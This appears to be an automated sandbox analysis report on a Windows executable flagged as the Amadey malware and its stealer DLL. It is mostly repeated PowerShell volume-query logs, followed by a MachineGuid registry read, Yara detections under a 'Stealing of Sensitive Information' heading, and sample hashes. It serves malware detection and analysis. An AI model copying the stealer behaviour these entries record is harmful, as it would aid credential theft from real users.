Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

0_2_00A3F05C

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A2C365 GetVersionExW,

0_2_00A2C365

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 14.2.powershell.exe.a081288.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.a081288.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2234189987.000000000A080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2235318287.000000000A0F1000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3354959740.000000000AAE1000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY

ID:	1428440
Product:	CloudBasic
Start time:	23:39:07
Start date:	18.04.2024
Sample:	jcgLYlM4dg.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	926fc8b724cc682d97cf0849c0fcbda3
SHA1:	2f1555afddb43a13be489200a751698302340056
SHA256:	bcd9d9e586c6d788717507307e47d2e7c85eeaa49e7766434dbeca97973f8e59
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	BB4887302071210501E562B7868F4DF8	AF2EBC1E83EDBC3D13356AD8EF498ED6B7B881EA	C6DD78956B6C260612ED364D8A71CB09FC7CE4C93EC0AC103B2A085EA38D2579
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
